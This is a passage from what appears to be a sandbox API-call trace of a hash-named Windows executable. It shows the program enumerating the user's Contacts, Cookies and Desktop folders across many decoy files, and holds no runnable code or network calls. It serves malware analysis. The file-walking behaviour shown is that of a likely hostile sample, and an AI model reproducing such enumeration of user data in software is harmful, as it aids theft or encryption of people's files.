(pszPath="") returned="" [0184.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.930] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\*" (normalized: "c:\\users\\keecfmwgj\\contacts\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.930] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.930] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0184.930] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.930] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0184.930] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.930] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.930] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Cookies\\") returned="Cookies\\" [0184.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0184.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.931] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0184.931] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.931] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.931] PathFindFileNameW (pszPath="") returned="" [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.931] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Cookies\\*" (normalized: "c:\\users\\keecfmwgj\\cookies\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0184.931] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.931] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.931] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0184.931] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.931] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.931] PathFindFileNameW (pszPath="") returned="" [0184.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.931] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c1ba620, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x8c1ba620, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c1ba620, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x8c1ba620, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1aff80, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0x6a1aff80, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x14375f00, ftLastWriteTime.dwHighDateTime=0x1d8a89b, nFileSizeHigh=0x0, nFileSizeLow=0xb6a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", cAlternateFileName="1918CC~1.EXE")) returned 1 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84870af0, ftCreationTime.dwHighDateTime=0x1d89e4e, ftLastAccessTime.dwLowDateTime=0xf46b4f10, ftLastAccessTime.dwHighDateTime=0x1d8a511, ftLastWriteTime.dwLowDateTime=0xf46b4f10, ftLastWriteTime.dwHighDateTime=0x1d8a511, nFileSizeHigh=0x0, nFileSizeLow=0x328e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1IkZJVoATh.xls", cAlternateFileName="1IKZJV~1.XLS")) returned 1 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a50e580, ftCreationTime.dwHighDateTime=0x1d89ae9, ftLastAccessTime.dwLowDateTime=0x426f2670, ftLastAccessTime.dwHighDateTime=0x1d89b4c, ftLastWriteTime.dwLowDateTime=0x426f2670, ftLastWriteTime.dwHighDateTime=0x1d89b4c, nFileSizeHigh=0x0, nFileSizeLow=0x5bcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2twJZ0dzmRfJrmP6B.mp3", cAlternateFileName="2TWJZ0~1.MP3")) returned 1 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e6ce890, ftCreationTime.dwHighDateTime=0x1d899d3, ftLastAccessTime.dwLowDateTime=0xd1e98ec0, ftLastAccessTime.dwHighDateTime=0x1d89ff8, ftLastWriteTime.dwLowDateTime=0xd1e98ec0, ftLastWriteTime.dwHighDateTime=0x1d89ff8, nFileSizeHigh=0x0, nFileSizeLow=0xaa39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2UV3oZuGwQu6CYc7-L.swf", cAlternateFileName="2UV3OZ~1.SWF")) returned 1 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2386cf50, ftCreationTime.dwHighDateTime=0x1d899fe, ftLastAccessTime.dwLowDateTime=0xa53a6410, ftLastAccessTime.dwHighDateTime=0x1d8a1cb, ftLastWriteTime.dwLowDateTime=0xa53a6410, ftLastWriteTime.dwHighDateTime=0x1d8a1cb, nFileSizeHigh=0x0, nFileSizeLow=0x6dbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="823XfKbFCBWP.m4a", cAlternateFileName="823XFK~1.M4A")) returned 1 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bef730, ftCreationTime.dwHighDateTime=0x1d89902, ftLastAccessTime.dwLowDateTime=0x697e4280, ftLastAccessTime.dwHighDateTime=0x1d8a454, ftLastWriteTime.dwLowDateTime=0x697e4280, ftLastWriteTime.dwHighDateTime=0x1d8a454, nFileSizeHigh=0x0, nFileSizeLow=0xd9ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bk2Yjoq3Rz.bmp", cAlternateFileName="BK2YJO~1.BMP")) returned 1 [0184.932] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa166e050, ftCreationTime.dwHighDateTime=0x1d89827, ftLastAccessTime.dwLowDateTime=0x16e79b70, ftLastAccessTime.dwHighDateTime=0x1d899b4, ftLastWriteTime.dwLowDateTime=0x16e79b70, ftLastWriteTime.dwHighDateTime=0x1d899b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bQ6SJi8RO0rg0dP", cAlternateFileName="BQ6SJI~1")) returned 1 [0184.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0184.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0184.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0184.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0184.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49860890, ftCreationTime.dwHighDateTime=0x1d8996f, ftLastAccessTime.dwLowDateTime=0x38492330, ftLastAccessTime.dwHighDateTime=0x1d8a727, ftLastWriteTime.dwLowDateTime=0x38492330, ftLastWriteTime.dwHighDateTime=0x1d8a727, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cc9_9V6aB.avi", cAlternateFileName="CC9_9V~1.AVI")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb99a60c0, ftCreationTime.dwHighDateTime=0x1d89b79, ftLastAccessTime.dwLowDateTime=0xb447f90, ftLastAccessTime.dwHighDateTime=0x1d89c43, ftLastWriteTime.dwLowDateTime=0xb447f90, ftLastWriteTime.dwHighDateTime=0x1d89c43, nFileSizeHigh=0x0, nFileSizeLow=0x153f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmt4.gif", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c27790, ftCreationTime.dwHighDateTime=0x1d89dfb, ftLastAccessTime.dwLowDateTime=0xe80a4750, ftLastAccessTime.dwHighDateTime=0x1d89e11, ftLastWriteTime.dwLowDateTime=0xe80a4750, ftLastWriteTime.dwHighDateTime=0x1d89e11, nFileSizeHigh=0x0, nFileSizeLow=0xc0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cTaPN4HhRqe86tN.rtf", cAlternateFileName="CTAPN4~1.RTF")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2064e0c0, ftCreationTime.dwHighDateTime=0x1d8a3c0, ftLastAccessTime.dwLowDateTime=0x6029ced0, ftLastAccessTime.dwHighDateTime=0x1d8a3f4, ftLastWriteTime.dwLowDateTime=0x6029ced0, ftLastWriteTime.dwHighDateTime=0x1d8a3f4, nFileSizeHigh=0x0, nFileSizeLow=0xd99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hSxa8JYxcBSx17jA94r_.jpg", cAlternateFileName="HSXA8J~1.JPG")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x132f3610, ftCreationTime.dwHighDateTime=0x1d8a5e3, ftLastAccessTime.dwLowDateTime=0xb7ae4320, ftLastAccessTime.dwHighDateTime=0x1d8a638, ftLastWriteTime.dwLowDateTime=0xb7ae4320, ftLastWriteTime.dwHighDateTime=0x1d8a638, nFileSizeHigh=0x0, nFileSizeLow=0x125e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I5zFv_jkMMjeubUquS.gif", cAlternateFileName="I5ZFV_~1.GIF")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8b27c80, ftCreationTime.dwHighDateTime=0x1d89b9f, ftLastAccessTime.dwLowDateTime=0xec6ca6a0, ftLastAccessTime.dwHighDateTime=0x1d8a41d, ftLastWriteTime.dwLowDateTime=0xec6ca6a0, ftLastWriteTime.dwHighDateTime=0x1d8a41d, nFileSizeHigh=0x0, nFileSizeLow=0x1084a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IjDhLcko.jpg", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f43bd50, ftCreationTime.dwHighDateTime=0x1d89ae1, ftLastAccessTime.dwLowDateTime=0x44e842d0, ftLastAccessTime.dwHighDateTime=0x1d89f28, ftLastWriteTime.dwLowDateTime=0x44e842d0, ftLastWriteTime.dwHighDateTime=0x1d89f28, nFileSizeHigh=0x0, nFileSizeLow=0xf347, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itjgP.m4a", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f082420, ftCreationTime.dwHighDateTime=0x1d8a0be, ftLastAccessTime.dwLowDateTime=0xeec1d250, ftLastAccessTime.dwHighDateTime=0x1d8a66f, ftLastWriteTime.dwLowDateTime=0xeec1d250, ftLastWriteTime.dwHighDateTime=0x1d8a66f, nFileSizeHigh=0x0, nFileSizeLow=0x14a44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2JjIfMTo45JZEp.jpg", cAlternateFileName="J2JJIF~1.JPG")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeab39500, ftCreationTime.dwHighDateTime=0x1d89b56, ftLastAccessTime.dwLowDateTime=0xd3f1f40, ftLastAccessTime.dwHighDateTime=0x1d8a5d4, ftLastWriteTime.dwLowDateTime=0xd3f1f40, ftLastWriteTime.dwHighDateTime=0x1d8a5d4, nFileSizeHigh=0x0, nFileSizeLow=0x938a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jqzylB.m4a", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe70751c0, ftCreationTime.dwHighDateTime=0x1d89828, ftLastAccessTime.dwLowDateTime=0x63fc4540, ftLastAccessTime.dwHighDateTime=0x1d8a702, ftLastWriteTime.dwLowDateTime=0x63fc4540, ftLastWriteTime.dwHighDateTime=0x1d8a702, nFileSizeHigh=0x0, nFileSizeLow=0x31a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K3t8MlfEa.mp3", cAlternateFileName="K3T8ML~1.MP3")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab48eb30, ftCreationTime.dwHighDateTime=0x1d8a020, ftLastAccessTime.dwLowDateTime=0xca94c40, ftLastAccessTime.dwHighDateTime=0x1d8a110, ftLastWriteTime.dwLowDateTime=0xca94c40, ftLastWriteTime.dwHighDateTime=0x1d8a110, nFileSizeHigh=0x0, nFileSizeLow=0x5bec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L-TI2NVRPaCP-tk9F.mkv", cAlternateFileName="L-TI2N~1.MKV")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ab0460, ftCreationTime.dwHighDateTime=0x1d8a1e1, ftLastAccessTime.dwLowDateTime=0x44576b00, ftLastAccessTime.dwHighDateTime=0x1d8a33a, ftLastWriteTime.dwLowDateTime=0x44576b00, ftLastWriteTime.dwHighDateTime=0x1d8a33a, nFileSizeHigh=0x0, nFileSizeLow=0x17fef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ldMOZunCS-h9r3 XU2.mp4", cAlternateFileName="LDMOZU~1.MP4")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99916d00, ftCreationTime.dwHighDateTime=0x1d8a2b3, ftLastAccessTime.dwLowDateTime=0x78d77500, ftLastAccessTime.dwHighDateTime=0x1d8a709, ftLastWriteTime.dwLowDateTime=0x78d77500, ftLastWriteTime.dwHighDateTime=0x1d8a709, nFileSizeHigh=0x0, nFileSizeLow=0x12934, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nQrFKLA.gif", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa28c14c0, ftCreationTime.dwHighDateTime=0x1d899fb, ftLastAccessTime.dwLowDateTime=0x6248b450, ftLastAccessTime.dwHighDateTime=0x1d8a28d, ftLastWriteTime.dwLowDateTime=0x6248b450, ftLastWriteTime.dwHighDateTime=0x1d8a28d, nFileSizeHigh=0x0, nFileSizeLow=0xc188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NWy04.bmp", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53478d0, ftCreationTime.dwHighDateTime=0x1d8a234, ftLastAccessTime.dwLowDateTime=0xc9a54260, ftLastAccessTime.dwHighDateTime=0x1d8a294, ftLastWriteTime.dwLowDateTime=0xc9a54260, ftLastWriteTime.dwHighDateTime=0x1d8a294, nFileSizeHigh=0x0, nFileSizeLow=0x10cce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfbL.flv", cAlternateFileName="")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf053c2f0, ftCreationTime.dwHighDateTime=0x1d8a62d, ftLastAccessTime.dwLowDateTime=0xbe4debb0, ftLastAccessTime.dwHighDateTime=0x1d8a6c7, ftLastWriteTime.dwLowDateTime=0xbe4debb0, ftLastWriteTime.dwHighDateTime=0x1d8a6c7, nFileSizeHigh=0x0, nFileSizeLow=0x4453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQ3XsPcRg.swf", cAlternateFileName="QQ3XSP~1.SWF")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2e94350, ftCreationTime.dwHighDateTime=0x1d898b1, ftLastAccessTime.dwLowDateTime=0xcb0bd270, ftLastAccessTime.dwHighDateTime=0x1d8a2f0, ftLastWriteTime.dwLowDateTime=0xcb0bd270, ftLastWriteTime.dwHighDateTime=0x1d8a2f0, nFileSizeHigh=0x0, nFileSizeLow=0x16ae6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QYjbm5MiXLG2.mp3", cAlternateFileName="QYJBM5~1.MP3")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbedbc90, ftCreationTime.dwHighDateTime=0x1d8a1b4, ftLastAccessTime.dwLowDateTime=0x31ba6940, ftLastAccessTime.dwHighDateTime=0x1d8a324, ftLastWriteTime.dwLowDateTime=0x31ba6940, ftLastWriteTime.dwHighDateTime=0x1d8a324, nFileSizeHigh=0x0, nFileSizeLow=0xfd37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RDY1PliN5xV7.mp4", cAlternateFileName="RDY1PL~1.MP4")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bbc0930, ftCreationTime.dwHighDateTime=0x1d89db9, ftLastAccessTime.dwLowDateTime=0x7c1e2b30, ftLastAccessTime.dwHighDateTime=0x1d8a4fe, ftLastWriteTime.dwLowDateTime=0x7c1e2b30, ftLastWriteTime.dwHighDateTime=0x1d8a4fe, nFileSizeHigh=0x0, nFileSizeLow=0x18aa5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RwqiCW2QitXLv4.jpg", cAlternateFileName="RWQICW~1.JPG")) returned 1 [0184.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44854050, ftCreationTime.dwHighDateTime=0x1d896da, ftLastAccessTime.dwLowDateTime=0xc153cac0, ftLastAccessTime.dwHighDateTime=0x1d897f7, ftLastWriteTime.dwLowDateTime=0xc153cac0, ftLastWriteTime.dwHighDateTime=0x1d897f7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sj76aMesI3jmtOuE2hz", cAlternateFileName="SJ76AM~1")) returned 1 [0184.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0184.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0184.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0184.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb46c0 [0184.934] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8924cf0, ftCreationTime.dwHighDateTime=0x1d8989c, ftLastAccessTime.dwLowDateTime=0xc756cb0, ftLastAccessTime.dwHighDateTime=0x1d89b0a, ftLastWriteTime.dwLowDateTime=0xc756cb0, ftLastWriteTime.dwHighDateTime=0x1d89b0a, nFileSizeHigh=0x0, nFileSizeLow=0x6177, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tHLd WYzw.ots", cAlternateFileName="THLDWY~1.OTS")) returned 1 [0184.934] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5da4cd0, ftCreationTime.dwHighDateTime=0x1d8a41d, ftLastAccessTime.dwLowDateTime=0x21ebf50, ftLastAccessTime.dwHighDateTime=0x1d8a69f, ftLastWriteTime.dwLowDateTime=0x21ebf50, ftLastWriteTime.dwHighDateTime=0x1d8a69f, nFileSizeHigh=0x0, nFileSizeLow=0x14b79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="US8ywh8D_vcXiYflf5e.m4a", cAlternateFileName="US8YWH~1.M4A")) returned 1 [0184.934] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, 